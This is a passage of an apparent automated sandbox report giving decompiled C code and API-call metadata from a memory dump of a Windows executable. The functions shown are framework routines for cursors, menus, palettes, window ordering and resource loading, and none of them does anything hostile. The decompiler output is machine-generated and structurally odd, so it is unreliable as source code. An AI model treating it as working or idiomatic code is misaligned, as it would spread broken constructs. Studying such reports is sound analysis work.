                    _t43 = _t123 + 0x4c; // 0x4c
                    _t67 = E00408670(_t43, 0x10, _t42);
                    if(_t67 != 0) {
                        goto L34;
                    }
                    if(_v28 != 0) {
                        _t77 =  *0x466514; // 0x0
                        if( *((intOrPtr*)( *_t77 + 0x3c))() != 0) {
                            _t79 =  *0x466514; // 0x0
                             *((intOrPtr*)( *_t79 + 0x34))();
                        }
                    }
                    _t74 =  *0x466514; // 0x0
                     *((intOrPtr*)( *_t74 + 0x30))();
                    _t76 =  *0x466514; // 0x0
                    asm("movsd");
                    asm("movsd");
                    asm("movsd");
                    asm("movsd");
                    return _t76;
                }
            } else {
                if(_t166 == 0 || ( *(_t166 + 0x51) & 0x00000020) != 0) {
                    L18:
                    _t86 =  *0x466534; // 0x0
                    E00443F50(_t86, _t163);
                    _t88 =  *0x466534; // 0x0
                    _t186 =  *((char*)(_t88 + 0x6a));
                    if( *((char*)(_t88 + 0x6a)) != 0) {
                        _t89 =  *0x466534; // 0x0
                        E00444070(_t89,  *((intOrPtr*)(_t122 + 4)),  *_t122, __eflags);
                    } else {
                        _t92 = GetDesktopWindow();
                        _t93 =  *0x466534; // 0x0
                        E00443F74(_t93, _t92, _t186,  *((intOrPtr*)(_t122 + 4)));
                    }
                    goto L22;
                } else {
                    _t95 =  *0x466514; // 0x0
                    if( *((char*)(_t95 + 4)) == 0) {
                        _t96 =  *0x466534; // 0x0
                        E004440E4(_t96, _t137, __eflags);
                        _t98 =  *0x462f14; // 0x466584
                        SetCursor(E00454B00( *_t98, _t163));
                        goto L22;
                    }
                    goto L18;
                }
            }
        } else {
            _t67 = E004384B8(1);
            if( *0x466514 == 0) {
                L34:
                return _t67;
            }
            _t107 =  *0x466514; // 0x0
             *((intOrPtr*)(_t107 + 8)) = _t166;
            _t108 =  *0x466514; // 0x0
             *((intOrPtr*)(_t108 + 0xc)) = _v28;
            _t109 =  *0x466514; // 0x0
             *((intOrPtr*)(_t109 + 0x10)) =  *_t122;
             *((intOrPtr*)(_t109 + 0x14)) =  *((intOrPtr*)(_t122 + 4));
            _t67 = E004384B8(0);
            if( *0x466514 == 0) {
                goto L34;
            }
            goto L12;
        }
    }
    _t115 =  *0x466520; // 0x0
    asm("cdq");
    _t173 = (_t115 -  *__eax ^ __edx) - __edx -  *0x46652c; // 0x0
    if(_t173 >= 0) {
        goto L3;
    }
    _t119 =  *0x466524; // 0x0
    asm("cdq");
    _t67 = (_t119 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
    _t174 = _t67 -  *0x46652c; // 0x0
    if(_t174 < 0) {
        goto L34;
    }
    goto L3;
}


                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00438609
                                                                            • GetDesktopWindow.USER32 ref: 00438739
                                                                            • SetCursor.USER32(00000000), ref: 0043878E
                                                                              • Part of subcall function 004440E4: ImageList_EndDrag.COMCTL32(?,-00000010,00438769), ref: 00444100
                                                                            • SetCursor.USER32(00000000), ref: 00438779
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CursorDesktopWindow$DragImageList_
                                                                            • String ID:
                                                                            • API String ID: 617806055-0
                                                                            • Opcode ID: 3bcd75b5abe411c5b0deca700f6720d75792e6beb4e63713e0ee92e8f9771c6a
                                                                            • Instruction ID: 08362208b1a53e947958c9dd7a602420f7f888ca1ef680945a718b5847218c5a
                                                                            • Opcode Fuzzy Hash: 3bcd75b5abe411c5b0deca700f6720d75792e6beb4e63713e0ee92e8f9771c6a
                                                                            • Instruction Fuzzy Hash: C7915274600240EFC704DF29E986A15B7E1BB48308F15916AF4458B37AEBB8ED45CF6B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
E0040F840(signed short* __eax) {
    char _v260;
    char _v768;
    char _v772;
    signed short* _v776;
    signed short* _v780;
    char _v784;
    signed int _v788;
    char _v792;
    intOrPtr* _v796;
    signed char _t43;
    intOrPtr* _t60;
    void* _t79;
    void* _t81;
    void* _t84;
    void* _t85;
    intOrPtr* _t92;
    void* _t96;
    char* _t97;
    void* _t98;

    _v776 = __eax;
    if((_v776[0] & 0x00000020) == 0) {
        E0040F688(0x80070057);
    }
    _t43 =  *_v776 & 0x0000ffff;
    if((_t43 & 0x00000fff) == 0xc) {
        if((_t43 & 0x00000040) == 0) {
            _v780 = _v776[4];
        } else {
            _v780 =  *(_v776[4]);
        }
        _v788 =  *_v780 & 0x0000ffff;
        _t79 = _v788 - 1;
        if(_t79 >= 0) {
            _t85 = _t79 + 1;
            _t96 = 0;
            _t97 =  &_v772;
            do {
                _v796 = _t97;
                _push(_v796 + 4);
                _t22 = _t96 + 1; // 0x1
                _push(_v780);
                L0040E714();
                E0040F688(_v780);
                _push( &_v784);
                _t25 = _t96 + 1; // 0x1
                _push(_v780);
                L0040E71C();
                E0040F688(_v780);
                 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                _t96 = _t96 + 1;
                _t97 = _t97 + 8;
                _t85 = _t85 - 1;
            } while (_t85 != 0);
        }
        _t81 = _v788 - 1;
        if(_t81 >= 0) {
            _t84 = _t81 + 1;
            _t60 =  &_v768;
            _t92 =  &_v260;
            do {
                 *_t92 =  *_t60;
                _t92 = _t92 + 4;
                _t60 = _t60 + 8;
                _t84 = _t84 - 1;
            } while (_t84 != 0);
            do {
                goto L12;
            } while (E0040F7E4(_t83, _t98) != 0);
            goto L15;
        }
        L12:
        _t83 = _v788 - 1;
        if(E0040F7B4(_v788 - 1, _t98) != 0) {
            _push( &_v792);
            _push( &_v260);
            _push(_v780);
            L0040E744();
            E0040F688(_v780);
            E0040FA38(_v792);
        }
    }
    L15:
    _push(_v776);
    L0040E2A4();
    return E0040F688(_v776);
}


                                                                            APIs
                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040F8EF
                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040F90B
                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040F982
                                                                            • VariantClear.OLEAUT32(?), ref: 0040F9AB
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                            • String ID:
                                                                            • API String ID: 920484758-0
                                                                            • Opcode ID: d17882f798cf53baf8a39fefcb7af180c9a2307b2ce2c27e917eb7973a9318f3
                                                                            • Instruction ID: 8ec9ce3e26e7a4601e4635a5e9cb7351c893333f832fa8fc9e86651aa83f5178
                                                                            • Opcode Fuzzy Hash: d17882f798cf53baf8a39fefcb7af180c9a2307b2ce2c27e917eb7973a9318f3
                                                                            • Instruction Fuzzy Hash: 19413F75A012199FCB61EB59CC90BC9B3BCAF48304F4045FAE548F7652DA38AF858F54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
E004283D0(intOrPtr __eax, void* __edx) {
    intOrPtr _v8;
    void* __ebx;
    void* __ecx;
    void* __esi;
    void* __ebp;
    intOrPtr _t33;
    intOrPtr _t59;
    struct HDC__* _t69;
    void* _t70;
    intOrPtr _t79;
    void* _t84;
    struct HPALETTE__* _t85;
    intOrPtr _t87;
    intOrPtr _t89;

    _t87 = _t89;
    _push(_t70);
    _v8 = __eax;
    _t33 = _v8;
    if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
        return _t33;
    } else {
        E004265A0(_v8);
        _push(_t87);
        _push(0x4284af);
        _push( *[fs:eax]);
        *[fs:eax] = _t89;
        E004296F8( *((intOrPtr*)(_v8 + 0x58)));
        E0042824C( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
        E004297F8( *((intOrPtr*)(_v8 + 0x58)));
        _t69 = CreateCompatibleDC(0);
        _t84 = *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
        if(_t84 == 0) {
            *((intOrPtr*)(_v8 + 0x5c)) = 0;
        } else {
            *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
        }
        _t85 = *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
        if(_t85 == 0) {
            *((intOrPtr*)(_v8 + 0x60)) = 0;
        } else {
            *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
            RealizePalette(_t69);
        }
        E004268A4(_v8, _t69);
        _t59 = *0x461eec; // 0x27f1c68
        E0041AAF4(_t59, _t69, _t70, _v8, _t85);
        _pop(_t79);
        *[fs:eax] = _t79;
        _push(0x4284b6);
        return E00426710(_v8);
    }
}


                                                                            APIs
                                                                              • Part of subcall function 004265A0: EnterCriticalSection.KERNEL32(00466380,00000000,00424F52,00000000,00424FB1), ref: 004265A8
                                                                              • Part of subcall function 004265A0: LeaveCriticalSection.KERNEL32(00466380,00466380,00000000,00424F52,00000000,00424FB1), ref: 004265B5
                                                                              • Part of subcall function 004265A0: EnterCriticalSection.KERNEL32(00000038,00466380,00466380,00000000,00424F52,00000000,00424FB1), ref: 004265BE
                                                                              • Part of subcall function 004297F8: GetDC.USER32(00000000), ref: 0042984E
                                                                              • Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00429863
                                                                              • Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042986D
                                                                              • Part of subcall function 004297F8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428423,00000000,004284AF), ref: 00429891
                                                                              • Part of subcall function 004297F8: ReleaseDC.USER32 ref: 0042989C
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00428425
                                                                            • SelectObject.GDI32(00000000,?), ref: 0042843E
                                                                            • SelectPalette.GDI32(00000000,?,000000FF), ref: 00428467
                                                                            • RealizePalette.GDI32(00000000), ref: 00428473
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                                            • String ID:
                                                                            • API String ID: 979337279-0
                                                                            • Opcode ID: 93bebc2edd455ddf18fa106c5646cc94971223008aa3a34a3a8727028a1c549a
                                                                            • Instruction ID: e87ff1c804d76903f950264df5696ada03ea7b14f1511ea4f0a767a0c079a61f
                                                                            • Opcode Fuzzy Hash: 93bebc2edd455ddf18fa106c5646cc94971223008aa3a34a3a8727028a1c549a
                                                                            • Instruction Fuzzy Hash: AA310934B01664EFD704EB59D981D4DB7F5EF48314B6241AAF804AB362DA38EE40DB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00434010(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
    intOrPtr _v8;
    void* __ecx;
    void* __edi;
    int _t27;
    void* _t40;
    int _t41;
    int _t50;

    _t50 = _t41;
    _t49 = __edx;
    _t40 = __eax;
    if(E004334A8(__eax) == 0) {
        return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
    }
    _v8 = 0;
    if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
        _t27 = GetMenuItemID(_t49, _t50);
        _t51 = _t27;
        if(_t27 != 0xffffffff) {
            _v8 = E00433324(_t40, 0, _t51);
        }
    } else {
        _t49 = GetSubMenu(_t49, _t50);
        _v8 = E00433324(_t40, 1, _t37);
    }
    if(_v8 == 0) {
        return 0;
    } else {
        *_a12 = 0;
        E004090D8(_a12, _a8, *((intOrPtr*)(_v8 + 0x30)));
        return E00409008(_a12, _t49);
    }
}


                                                                            APIs
                                                                            • GetMenuState.USER32 ref: 00434033
                                                                            • GetSubMenu.USER32 ref: 0043403E
                                                                            • GetMenuItemID.USER32(?,?), ref: 00434057
                                                                            • GetMenuStringA.USER32(?,?,?,?,?), ref: 004340AA
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Menu$ItemStateString
                                                                            • String ID:
                                                                            • API String ID: 306270399-0
                                                                            • Opcode ID: c83668f70c58b27ff1ae3854190cf90560c38d16cda432900dd57c84b320ed91
                                                                            • Instruction ID: 11efe109d52895c86013a67b98394270421268660deb29a3708cc45bd7cb4ea2
                                                                            • Opcode Fuzzy Hash: c83668f70c58b27ff1ae3854190cf90560c38d16cda432900dd57c84b320ed91
                                                                            • Instruction Fuzzy Hash: 0511AF31701214AFC714EE69CC809EF7BE8AF89364F10542AF909D7382CA38AD019768
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 65%
E00429958(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
    intOrPtr _v8;
    intOrPtr _v12;
    intOrPtr _t62;
    intOrPtr _t64;
    intOrPtr _t67;
    void* _t77;
    void* _t78;
    intOrPtr _t79;
    intOrPtr _t80;

    _t77 = _t78;
    _t79 = _t78 + 0xfffffff8;
    _v8 = __eax;
    _v12 = E004038F8(1);
    _push(_t77);
    _push(0x4299e0);
    _push( *[fs:eax]);
    *[fs:eax] = _t79;
    *((intOrPtr*)(_v12 + 8)) = __edx;
    *((intOrPtr*)(_v12 + 0x10)) = __ecx;
    memcpy(_v12 + 0x18, _a12, 0x15 << 2);
    _t80 = _t79 + 0xc;
    _t12 = &_a8; // 0x466368
    *((char*)(_v12 + 0x70)) = *_t12 & 0x000000ff;
    if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
        *((intOrPtr*)(_v12 + 0x14)) = *((intOrPtr*)(_v12 + 8));
    }
    _t62 = *0x418b88; // 0x418bd4
    *((intOrPtr*)(_v12 + 0x6c)) = E00403AD8(_a4, _t62);
    _pop(_t64);
    *[fs:eax] = _t64;
    EnterCriticalSection(0x466368);
    _push(_t77);
    _push(0x429a40);
    _push( *[fs:edx]);
    *[fs:edx] = _t80;
    E004284C0( *((intOrPtr*)(_v8 + 0x28)));
    *((intOrPtr*)(_v8 + 0x28)) = _v12;
    E004284BC(_v12);
    _pop(_t67);
    *[fs:eax] = _t67;
    _push(0x429a47);
    LeaveCriticalSection(0x466368);
    return 0;
}


                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(00466368), ref: 004299FC
                                                                            • LeaveCriticalSection.KERNEL32(00466368,00429A47,00466368), ref: 00429A3A
                                                                            Strings
                                                                            • XHB , xrefs: 0042996A
                                                                            • hcF , xrefs: 004299A6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave
                                                                            • String ID: XHB$hcF
                                                                            • API String ID: 3168844106-4103439798
                                                                            • Opcode ID: ff56ce312c069636ff70dcece962d5d7b289df0c569e2d8a3dddfc511be1f011
                                                                            • Instruction ID: b30c6dabbdf70119b55d85a08352cb78ceca07d7645c1d65d08a879069df6dfc
                                                                            • Opcode Fuzzy Hash: ff56ce312c069636ff70dcece962d5d7b289df0c569e2d8a3dddfc511be1f011
                                                                            • Instruction Fuzzy Hash: 75219C74B04308AFC701DF69D88198DBBF5FB89320F6181AAF840A7351D778AE80CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00455BB4(void* __eax, void* __ecx, char __edx) {
    char _v12;
    struct HWND__* _v20;
    int _t17;
    void* _t27;
    struct HWND__* _t33;
    void* _t35;
    void* _t36;
    long _t37;

    _t37 = _t36 + 0xfffffff8;
    _t27 = __eax;
    _t17 = *0x466580; // 0x27bf470
    if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
        if( *((intOrPtr*)(__eax + 0x94)) == 0) {
            *_t37 = *((intOrPtr*)(__eax + 0x30));
            _v12 = __edx;
            EnumWindows(E00455B44, _t37);
            _t5 = _t27 + 0x90; // 0x0
            _t17 = *_t5;
            if( *((intOrPtr*)(_t17 + 8)) != 0) {
                _t33 = GetWindow(_v20, 3);
                _v20 = _t33;
                if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
                    _v20 = 0xfffffffe;
                }
                _t10 = _t27 + 0x90; // 0x0
                _t17 = *_t10;
                _t35 = *((intOrPtr*)(_t17 + 8)) - 1;
                if(_t35 >= 0) {
                    do {
                        _t13 = _t27 + 0x90; // 0x0
                        _t17 = SetWindowPos(E0041A80C( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
                        _t35 = _t35 - 1;
                    } while (_t35 != 0xffffffff);
                }
            }
        }
        *((intOrPtr*)(_t27 + 0x94)) = *((intOrPtr*)(_t27 + 0x94)) + 1;
    }
    return _t17;
}


                                                                            APIs
                                                                            • EnumWindows.USER32(00455B44), ref: 00455BE9
                                                                            • GetWindow.USER32(00000003,00000003), ref: 00455C01
                                                                            • GetWindowLongA.USER32 ref: 00455C0E
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00455C4D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$EnumLongWindows
                                                                            • String ID:
                                                                            • API String ID: 4191631535-0
                                                                            • Opcode ID: f23556552e1aea1059882e65ad043ba57e80b2ff24d4e9f5c909e951feda954a
                                                                            • Instruction ID: b5efe040d9ee5e4ec0beb5a4be758dd33e8dc33b5e347aa2bed5e18668bfd801
                                                                            • Opcode Fuzzy Hash: f23556552e1aea1059882e65ad043ba57e80b2ff24d4e9f5c909e951feda954a
                                                                            • Instruction Fuzzy Hash: F2119E306047509FDB21EB28CC85FA673D4AB05325F1402BAFE58AB2D3C3789C84C76A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0043A4D8(void* __eax, int __ecx, int __edx) {
    void* _t6;
    intOrPtr _t16;
    int _t27;
    int _t28;
    int _t29;
    int _t30;
    int _t31;
    int _t32;

    _t6 = __eax;
    _t27 = __ecx;
    _t28 = __edx;
    _t16 = *((intOrPtr*)(__eax + 0x74));
    _t29 = *(_t16 + 0x14);
    if(_t29 > 0) {
        _t6 = E00439390(_t16, MulDiv(_t29, __edx, __ecx), 3);
    }
    _t30 = *(_t16 + 0xc);
    if(_t30 > 0) {
        _t6 = E00439390(_t16, MulDiv(_t30, _t28, _t27), 1);
    }
    _t31 = *(_t16 + 0x10);
    if(_t31 > 0) {
        _t6 = E00439390(_t16, MulDiv(_t31, _t28, _t27), 2);
    }
    _t32 = *(_t16 + 8);
    if(_t32 > 0) {
        return E00439390(_t16, MulDiv(_t32, _t28, _t27), 0);
    }
    return _t6;
}

                                                                            APIs
                                                                            • MulDiv.KERNEL32(?), ref: 0043A4ED
                                                                            • MulDiv.KERNEL32(?), ref: 0043A50A
                                                                            • MulDiv.KERNEL32(?), ref: 0043A527
                                                                            • MulDiv.KERNEL32(?), ref: 0043A544
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 343edcee43f4d4a2bc000d28523ac80406228f184dd9ae9d624a554c2fb86fce
                                                                            • Instruction ID: f4bc81ab66daf8a9df15c71cec539322716d65d0bf1aec78caf828b6dab18041
                                                                            • Opcode Fuzzy Hash: 343edcee43f4d4a2bc000d28523ac80406228f184dd9ae9d624a554c2fb86fce
                                                                            • Instruction Fuzzy Hash: 6A0116613002182BC724BD2B5C45F5B3AADDBC9754F01507E791A9B383EAA9ED2082A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 80%
E0041D024(void* __eax, struct HINSTANCE__* __edx, CHAR* _a8) {
    CHAR* _v8;
    void* __ebx;
    void* __ecx;
    void* __edi;
    void* __esi;
    void* __ebp;
    void* _t18;
    void* _t23;
    CHAR* _t24;
    void* _t25;
    struct HRSRC__* _t29;
    void* _t30;
    struct HINSTANCE__* _t31;
    void* _t32;

    _v8 = _t24;
    _t31 = __edx;
    _t23 = __eax;
    _t29 = FindResourceA(__edx, _v8, _a8);
    *(_t23 + 0x10) = _t29;
    if(_t29 == 0) {
        E0041CF84(_t23, _t24, _t29, _t31, _t32);
        _pop(_t24);
    }
    _t5 = _t23 + 0x10; // 0x41d0c0
    _t30 = LoadResource(_t31, *_t5);
    *(_t23 + 0x14) = _t30;
    if(_t30 == 0) {
        E0041CF84(_t23, _t24, _t30, _t31, _t32);
    }
    _t7 = _t23 + 0x10; // 0x41d0c0
    _push(SizeofResource(_t31, *_t7));
    _t8 = _t23 + 0x14; // 0x41cd68
    _t18 = LockResource( *_t8);
    _pop(_t25);
    return E0041CD28(_t23, _t25, _t18);
}

                                                                            APIs
                                                                            • FindResourceA.KERNEL32(?,?,?), ref: 0041D03B
                                                                            • LoadResource.KERNEL32(?,0041D0C0,?,?,?,00418C50,?,00000001,00000000,?,0041CF66,00000000,?), ref: 0041D055
                                                                            • SizeofResource.KERNEL32(?,0041D0C0,?,0041D0C0,?,?,?,00418C50,?,00000001,00000000,?,0041CF66,00000000,?), ref: 0041D06F
                                                                            • LockResource.KERNEL32(0041CD68,00000000,?,0041D0C0,?,0041D0C0,?,?,?,00418C50,?,00000001,00000000,?,0041CF66,00000000), ref: 0041D079
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: 5d89a7fb75850f26319e684402d0780e3acc06d2bdee2c569710ca98c6396b59
                                                                            • Instruction ID: 11fe1cfdb4414f926eae3f9df9586ded9b707078bdbb83b49df9978c7684b3c8
                                                                            • Opcode Fuzzy Hash: 5d89a7fb75850f26319e684402d0780e3acc06d2bdee2c569710ca98c6396b59
                                                                            • Instruction Fuzzy Hash: D0F0ADB36042146F8744EF6EAC81D9B7BECEE88364310012FF908D7242DA38ED118778
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 87%
E004383DC(struct HWND__* __eax, void* __ecx) {
    intOrPtr _t9;
    signed int _t16;
    struct HWND__* _t19;
    DWORD* _t20;

    _t17 = __ecx;
    _push(__ecx);
    _t19 = __eax;
    _t16 = 0;
    if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() == *_t20) {
        _t9 = *0x466504; // 0x27ea898
        if(GlobalFindAtomA(E00404C00(_t9)) != *0x466500) {
            _t16 = 0 | E00437448(_t19, _t17) != 0x00000000;
        } else {
            _t16 = 0 | GetPropA(_t19, *0x466500 & 0x0000ffff) != 0x00000000;
        }
    }
    return _t16;
}

                                                                            APIs
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 004383E9
                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,00438454,-000000F7,?,00000000,0043800E,?,-00000010,?), ref: 004383F2
                                                                            • GlobalFindAtomA.KERNEL32(00000000), ref: 00438407
                                                                            • GetPropA.USER32 ref: 0043841E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                            • String ID:
                                                                            • API String ID: 2582817389-0
                                                                            • Opcode ID: c8253abe16581fcb99d44ece300b1cfe7add3b6cfb4c013908db5c544134e519
                                                                            • Instruction ID: edcf506c367d5b21f12e8bc81a0964d5f28cf71cb3e8e791f3115fe585ddaeb4
                                                                            • Opcode Fuzzy Hash: c8253abe16581fcb99d44ece300b1cfe7add3b6cfb4c013908db5c544134e519
                                                                            • Instruction Fuzzy Hash: D3F0276120622367D2307B726D4287F514C8D143A4B81503FFD00E2141FB6CDC52A1BF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 87%
E0043747C(struct HWND__* __eax, void* __ecx) {
    intOrPtr _t5;
    struct HWND__* _t12;
    void* _t15;
    DWORD* _t16;

    _t13 = __ecx;
    _push(__ecx);
    _t12 = __eax;
    _t15 = 0;
    if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() == *_t16) {
        _t5 = *0x466508; // 0x27f1cc0
        if(GlobalFindAtomA(E00404C00(_t5)) != *0x466502) {
            _t15 = E00437448(_t12, _t13);
        } else {
            _t15 = GetPropA(_t12, *0x466502 & 0x0000ffff);
        }
    }
    return _t15;
}

                                                                            APIs
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00437489
                                                                            • GetCurrentProcessId.KERNEL32(?,00460C02,00000000,004586E9,?,?,00460C02,00000001,00456D34,?,00000000,00000000,00000000,00000001), ref: 00437492
                                                                            • GlobalFindAtomA.KERNEL32(00000000), ref: 004374A7
                                                                            • GetPropA.USER32 ref: 004374BE
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                            • String ID:
                                                                            • API String ID: 2582817389-0
                                                                            • Opcode ID: c8e0bd2b717ad0fe8b96e023d763a59c78b2238a2bd2172c60bb73f231bb40c6
                                                                            • Instruction ID: a2f4f6fb400889014e80e2d2de551d02392c32fcff4c83d9196b20b4c67440de
                                                                            • Opcode Fuzzy Hash: c8e0bd2b717ad0fe8b96e023d763a59c78b2238a2bd2172c60bb73f231bb40c6
